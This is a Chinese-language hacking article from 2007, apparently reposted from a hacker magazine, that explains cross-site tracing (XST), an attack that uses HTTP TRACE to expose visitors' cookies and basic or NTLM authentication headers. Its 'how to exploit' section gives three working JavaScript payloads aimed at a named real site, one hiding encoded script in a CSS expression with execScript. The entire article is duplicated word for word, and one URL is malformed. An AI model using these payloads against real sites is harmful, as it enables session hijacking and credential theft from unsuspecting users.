cross-site tracing XST攻擊
更新時間:2007年01月16日 00:00:00 作者:
注意:文章已經(jīng)發(fā)表于8期黑客防線,版權(quán)歸其所
XST攻擊描述:
攻擊者將惡意代碼嵌入一臺已經(jīng)被控制的主機上的web文件,當訪問者瀏覽時惡意代碼在瀏覽器中執(zhí)行,然后訪問者的cookie、http基本驗證以及ntlm驗證信息將被發(fā)送到已經(jīng)被控制的主機,同時傳送Trace請求給目標主機,導(dǎo)致cookie欺騙或者是中間人攻擊。
XST攻擊條件:
1、需要目標web服務(wù)器允許Trace參數(shù);
2、需要一個用來插入XST代碼的地方;
3、目標站點存在跨域漏洞。
XST與XSS的比較:
相同點:都具有很大的欺騙性,可以對受害主機產(chǎn)生危害,而且這種攻擊是多平臺多技術(shù)的,我們還可以利用Active控件、Flash、Java等來進行XST和XSS攻擊。
優(yōu)點:可以繞過一般的http驗證以及NTLM驗證
如何利用:
手法1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"http://wmjie.51.net/swords/\";
setTimeout(
function () {
//以下必須寫在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 顯示站點wmjie.51.net/swords/ 的頭信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"http://wmjie.51.net/swords/\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">
后記:研究階段,希望能拋磚引玉,期望和您能夠交流心得體會。
XST攻擊描述:
攻擊者將惡意代碼嵌入一臺已經(jīng)被控制的主機上的web文件,當訪問者瀏覽時惡意代碼在瀏覽器中執(zhí)行,然后訪問者的cookie、http基本驗證以及ntlm驗證信息將被發(fā)送到已經(jīng)被控制的主機,同時傳送Trace請求給目標主機,導(dǎo)致cookie欺騙或者是中間人攻擊。
XST攻擊條件:
1、需要目標web服務(wù)器允許Trace參數(shù);
2、需要一個用來插入XST代碼的地方;
3、目標站點存在跨域漏洞。
XST與XSS的比較:
相同點:都具有很大的欺騙性,可以對受害主機產(chǎn)生危害,而且這種攻擊是多平臺多技術(shù)的,我們還可以利用Active控件、Flash、Java等來進行XST和XSS攻擊。
優(yōu)點:可以繞過一般的http驗證以及NTLM驗證
如何利用:
手法1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"http://wmjie.51.net/swords/\";
setTimeout(
function () {
//以下必須寫在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 顯示站點wmjie.51.net/swords/ 的頭信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"http://wmjie.51.net/swords/\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">
后記:研究階段,希望能拋磚引玉,期望和您能夠交流心得體會。
相關(guān)文章
河南移動網(wǎng)絡(luò)客服系統(tǒng)驗證碼的缺陷分析和利用!
河南移動網(wǎng)絡(luò)客服系統(tǒng)驗證碼的缺陷分析和利用!...2007-01-01Windows家族內(nèi)部各個安全漏洞集體大搜捕(圖)
Windows家族內(nèi)部各個安全漏洞集體大搜捕(圖)...2007-01-01焦點技術(shù):Google你真好(Google Hack)
焦點技術(shù):Google你真好(Google Hack)...2007-01-01